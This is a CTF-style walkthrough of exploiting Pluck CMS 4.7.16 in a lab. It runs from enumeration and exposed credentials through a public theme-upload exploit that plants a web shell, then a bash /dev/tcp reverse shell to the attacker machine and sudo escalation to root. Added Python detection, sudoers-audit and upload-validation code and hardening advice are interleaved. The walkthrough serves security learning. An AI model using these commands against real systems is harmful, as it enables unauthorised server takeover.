Pluck CMS 4.7.16 Theme Upload RCE — CTF Walkthrough & Exploit Guide

This article is a CTF-style, hands-on walkthrough for exploiting Pluck CMS 4.7.16 using a known Theme Upload RCE vulnerability. Pluck CMS is a lightweight open-source content management system. Version 4.7.16 contains a critical vulnerability that allows authenticated users to upload a malicious theme file, enabling complete takeover of the server. This vulnerability is publicly referenced as a Theme Upload RCE exploit.

You will learn how to:
  • Discover the target and enumerate services
  • Find exposed credentials and log in as admin
  • Use a public exploit to upload a web shell
  • Obtain a reverse shell and pivot to the target system
  • Escalate privileges from www-data to pluck to root

CTF Step 0 Environment & Setup

For this walkthrough you need VirtualBox or VMware with two VMs on the same network:

  • Attacker: Kali Linux (IP: e.g. 10.0.2.6)
  • Target: Ubuntu VM running Pluck CMS 4.7.16 (IP: e.g. 10.0.2.5)

Ensure the VMs use a Bridged Adapter or NAT so they can communicate.


CTF Step 1 Target discovery & service enumeration

Find the target IP using netdiscover:

sudo netdiscover -r 10.0.2.0/24

Scan the host with nmap to discover open ports and services:

nmap -A -T4 10.0.2.5

Expected result: port 80 open and Apache2 running. Open http://10.0.2.5 in a browser to confirm.


Directory enumeration

Use ffuf (or dirsearch) to find hidden directories:

ffuf -u http://10.0.2.5/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt

Look for a folder like /pluck which contains the CMS.

CTF Step 2 Credential discovery (robots.txt / secret files)

Check /robots.txt for disallowed paths:

curl http://10.0.2.5/pluck/robots.txt

Example output may list /data, /docs and /secret.txt. Open secret.txt to find credentials:

admin:global123

Log in to the Pluck admin panel at http://10.0.2.5/pluck/login.php using the discovered credentials.

CTF Step 3 Exploit: Theme upload → Web shell

Confirm the CMS version (4.7.16) after logging in at http://10.0.2.5/pluck/login.php, then search for public exploits (GitHub hosts a proof-of-concept repository for this CVE).

Clone the exploit repo and inspect files:

git clone https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC pluck-exploit
cd pluck-exploit
ls -la

Typical files include exploit.py and shell.tar (the payload).

Run the exploit (example syntax; follow the repository's README):

python3 exploit.py -u http://10.0.2.5 -U admin -P global123

Successful output:

Authentication successful
Web shell uploaded: http://10.0.2.5/pluck/data/themes/shell/shell.php
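From the defender's side, the trace this step leaves is distinctive: a PHP file is requested from /pluck/data/themes/, a directory the CMS writes to and Apache also executes from. The following detection logic is an added example, not part of the original post or of Pluck; it parses Apache combined-format access log lines (the sample lines are constructed), flags any executable served from the writable data tree, and notes whether the same client had already posted to the login form, which the authenticated theme upload requires. It assumes the CMS lives under /pluck and that logins go to /pluck/login.php, as in this walkthrough.

```python
"""
Detect PHP being served from Pluck's writable data directory in Apache
combined-format access logs. Added example; sample log lines are constructed.
"""
import re
from dataclasses import dataclass

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?$'
)
# Executable file types under the CMS's writable data tree (assumed base path /pluck).
DATA_EXEC_RE = re.compile(r"^/pluck/data/.+\.(php\d*|phtml|phar)$", re.I)
LOGIN_PATH = "/pluck/login.php"


@dataclass
class Finding:
    ip: str
    timestamp: str
    method: str
    target: str
    status: str
    reason: str


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def scan_access_log(lines):
    """
    Single pass over the log in order. Every request for an executable under
    /pluck/data/ becomes a Finding; if the client had already logged in
    (successful POST to the login form), the finding says so.
    """
    findings = []
    logged_in = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].split("?", 1)[0]  # drop the query string before matching
        if rec["method"] == "POST" and path == LOGIN_PATH and rec["status"][0] in "23":
            logged_in.add(rec["ip"])
            continue
        if DATA_EXEC_RE.match(path):
            reason = "php served from writable data directory"
            if rec["ip"] in logged_in:
                reason += " (client authenticated earlier)"
            findings.append(Finding(rec["ip"], rec["ts"], rec["method"],
                                    rec["target"], rec["status"], reason))
    return findings


def suspicious_clients(lines):
    """Sorted list of client IPs with at least one finding."""
    return sorted({f.ip for f in scan_access_log(lines)})


# Constructed sample log: one attacker session plus a benign request and a garbage line.
SAMPLE_LOG = """\
10.0.2.6 - - [10/Mar/2024:10:01:02 +0000] "GET /pluck/ HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.2.6 - - [10/Mar/2024:10:01:20 +0000] "POST /pluck/login.php HTTP/1.1" 302 0 "http://10.0.2.5/pluck/login.php" "Mozilla/5.0"
10.0.2.6 - - [10/Mar/2024:10:02:05 +0000] "GET /pluck/data/themes/shell/shell.php HTTP/1.1" 200 1234 "-" "python-requests/2.31"
10.0.2.6 - - [10/Mar/2024:10:02:40 +0000] "POST /pluck/data/themes/shell/shell.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.2.9 - - [10/Mar/2024:10:03:00 +0000] "GET /pluck/data/themes/default/style.css HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
this line is not a log record and must be skipped
""".splitlines()

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} {f.method} {f.target} {f.status}: {f.reason}")
```

On a real host, feed it /var/log/apache2/access.log. The detection is a stop-gap; the structural fix is to stop Apache executing PHP under /pluck/data/ at all (for example a `<Directory>` or .htaccess block that denies `.php` requests in that tree), so an uploaded file is served as inert text or not at all.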

CTF Step 4 Get a reverse shell

Open a netcat listener on the attacker machine:

nc -lvnp 1234

From the web shell interface (or by visiting the uploaded shell in a browser), execute a reverse shell back to the attacker:

bash -c 'bash -i >& /dev/tcp/10.0.2.6/1234 0>&1'

On the listener you should see a connection and get a shell as www-data:

www-data@target:~$ whoami
www-data

CTF Step 5 Privilege Escalation: www-data → pluck → root

1. Enumerate the file system & users

From the www-data shell (www-data@pluck:/$), start by inspecting the home directories and looking for interesting files:

cd /home
ls -la

2. Find credentials in hidden files

Look for dotfiles and config snippets. In this CTF, a hidden file exposes the pluck user's password:

cat /home/pluck/.viminfo
# contains: keep my password safe: password123

3. Switch to pluck

su pluck
# Enter password: password123
whoami
# pluck

4. Check sudo privileges

Use sudo -S -l to list allowed sudo commands:

sudo -S -l
# (pluck) ALL=(ALL) ALL

Output indicates pluck can run all commands via sudo — a full privilege escalation path.

5. Escalate to root

sudo su
whoami
# root

Now read the root flag:

cat /root/flag.txt
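The sudo -l output in step 4 is the whole privilege escalation: a rule granting any command as any user. The following audit script is an added example, not part of the original post; it parses sudoers-format rules (the sample text is constructed) and lists every user or %group holding a root-equivalent grant, including the `(root) ALL` form that looks narrower than `(ALL) ALL` but is not. It understands the common one-line user and group specifications (host, optional runas, optional tags, command list) and deliberately ignores aliases and include directives.

```python
"""
Find blanket sudoers grants. Added example; the sudoers text is constructed.
"""
import re
import sys

RULE_RE = re.compile(
    r"^(?P<who>%?[\w.@+-]+)\s+(?P<host>\S+)\s*=\s*"  # user or %group, host list
    r"(?:\((?P<runas>[^)]*)\)\s*)?"                    # optional (runas_user[:runas_group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                       # optional tags such as NOPASSWD:
    r"(?P<cmds>.+)$"                                   # comma-separated command list
)


def parse_sudoers(text):
    """Parse one-line rules into dicts; comments, blank lines and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m["runas"] or "root").strip()  # no (...) clause means "run as root"
        rules.append({
            "who": m["who"],
            "host": m["host"],
            "runas_user": runas.split(":", 1)[0].strip() or "root",
            "nopasswd": "NOPASSWD" in m["tags"],
            "cmds": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules


def is_root_equivalent(rule):
    """Any command, as root or as any user, is full control of the host."""
    return rule["cmds"] == ["ALL"] and rule["runas_user"] in ("ALL", "root")


def blanket_grants(text, ignore=("root",)):
    """Names of principals holding a root-equivalent rule, in file order."""
    return [r["who"] for r in parse_sudoers(text)
            if is_root_equivalent(r) and r["who"] not in ignore]


# Constructed sample, not a real /etc/sudoers.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
pluck   ALL=(ALL) ALL                    # the grant found in this CTF
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
deploy  ALL=(www-data) ALL
"""

if __name__ == "__main__":
    # Pass a sudoers file (or a file from /etc/sudoers.d) as the first argument.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    for who in blanket_grants(text):
        print(f"root-equivalent sudo grant: {who}")
```

Reading /etc/sudoers and /etc/sudoers.d/* needs root, so this is an audit you run as the administrator, not something the www-data shell gets you. The remediation for the rule found here is to replace `ALL` with the specific commands the pluck account actually needs.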

CTF Step 6 Mitigation & Hardening

Key recommendations to prevent this class of vulnerability:

  • Keep CMS software and plugins up-to-date — apply security patches promptly.
  • Restrict file upload functionality: validate file types, use server-side checks, and store uploads outside the webroot or use strict filename filtering.
  • Harden admin credentials: avoid storing credentials in easily-readable files like /secret.txt or dotfiles.
  • Restrict sudo access: avoid giving users blanket ALL=(ALL) ALL privileges.
  • Reduce attack surface: disable directory listing and remove unnecessary files (e.g., old backup archives) from webroot.
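The upload hardening bullets above can be turned into a concrete server-side check. The validator below is an added example, not Pluck's own upload code; it inspects a theme archive before anything is unpacked into the web root and rejects path traversal, absolute paths, symbolic and hard links, executable file types anywhere in the name (so a double extension such as logo.php.png is caught too), anything outside an allow-list of static file types, and oversized archives. The sample archives are constructed in memory.

```python
"""
Validate an uploaded theme archive before unpacking. Added example; the
sample archives are constructed here, not taken from any real theme.
"""
import io
import posixpath
import re
import tarfile

ALLOWED_EXT = {".css", ".html", ".htm", ".js", ".png", ".jpg", ".jpeg",
               ".gif", ".svg", ".txt", ".md", ".woff", ".woff2"}
# Any of these anywhere in the dotted name counts as server-executable.
EXEC_EXT_RE = re.compile(r"\.(php\d*|phtml|phar|phps|cgi|pl|sh)(\.|$)")
MAX_MEMBERS = 500
MAX_TOTAL_BYTES = 5 * 1024 * 1024


def check_member_name(name):
    """Return a problem string if the archive path is unsafe, else None."""
    if not name or "\x00" in name:
        return "empty or NUL-containing name"
    if name.startswith(("/", "\\")) or "\\" in name:
        return f"absolute or backslash path: {name!r}"
    norm = posixpath.normpath(name)
    if norm == ".." or norm.startswith("../"):
        return f"path traversal: {name!r}"
    return None


def validate_theme_archive(data):
    """Return a list of problems; an empty list means the archive may be unpacked."""
    try:
        tf = tarfile.open(fileobj=io.BytesIO(data), mode="r:*")
    except tarfile.TarError as exc:
        return [f"not a readable tar archive: {exc}"]
    problems, total = [], 0
    with tf:
        members = tf.getmembers()
        if len(members) > MAX_MEMBERS:
            problems.append(f"too many entries: {len(members)}")
        for m in members:
            bad = check_member_name(m.name)
            if bad:
                problems.append(bad)
                continue
            if m.issym() or m.islnk():
                problems.append(f"link not allowed: {m.name!r} -> {m.linkname!r}")
                continue
            if m.isdir():
                continue
            if not m.isfile():
                problems.append(f"special file not allowed: {m.name!r}")
                continue
            lower = m.name.lower()
            if EXEC_EXT_RE.search(lower):
                problems.append(f"executable file type: {m.name!r}")
            elif posixpath.splitext(lower)[1] not in ALLOWED_EXT:
                problems.append(f"file type not on allow-list: {m.name!r}")
            total += m.size
    if total > MAX_TOTAL_BYTES:
        problems.append(f"unpacked size too large: {total} bytes")
    return problems


def build_tar(files=(), symlinks=()):
    """Build a gzipped tar in memory (fixture for the samples below)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files:
            info = tarfile.TarInfo(name)
            if content is None:
                info.type = tarfile.DIRTYPE
                tf.addfile(info)
            else:
                info.size = len(content)
                tf.addfile(info, io.BytesIO(content))
        for name, target in symlinks:
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tf.addfile(info)
    return buf.getvalue()


# Constructed sample archives: one clean theme, one carrying every rejected pattern.
GOOD_THEME = build_tar([
    ("mytheme/", None),
    ("mytheme/style.css", b"body { margin: 0 }"),
    ("mytheme/index.html", b"<html></html>"),
    ("mytheme/logo.png", b"\x89PNG\r\n"),
])
BAD_THEME = build_tar(
    files=[
        ("mytheme/index.html", b"<html></html>"),
        ("../../index.php", b"<?php echo 1;"),       # escapes the theme directory
        ("mytheme/shell.php", b"<?php echo 1;"),     # executable in a writable directory
        ("mytheme/logo.php.png", b"\x89PNG\r\n"),    # double extension
    ],
    symlinks=[("mytheme/passwd", "/etc/passwd")],    # link pointing out of the tree
)

if __name__ == "__main__":
    print("good theme:", validate_theme_archive(GOOD_THEME))
    print("bad theme:", *validate_theme_archive(BAD_THEME), sep="\n  ")
```

The validator is deliberately strict about PHP because the directory it protects is one the web server executes from; a CMS whose themes legitimately contain templates would need to unpack them somewhere PHP execution is disabled. Even after validation, extract with the standard library's safe filter (`extractall(path, filter="data")`, available from Python 3.12) rather than a bare `extractall`, so the archive check and the extraction step enforce the same rules.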

Conclusion

This CTF-style walkthrough demonstrates a full exploitation chain against Pluck CMS 4.7.16: from discovery and credential harvesting to RCE, reverse shell, and final privilege escalation. Use the steps in a controlled lab environment to practice and learn defensive countermeasures.

Disclaimer: This guide is for educational and authorized CTF / lab use only. Never test exploits against systems you don’t own or have explicit permission to assess.



0 Comments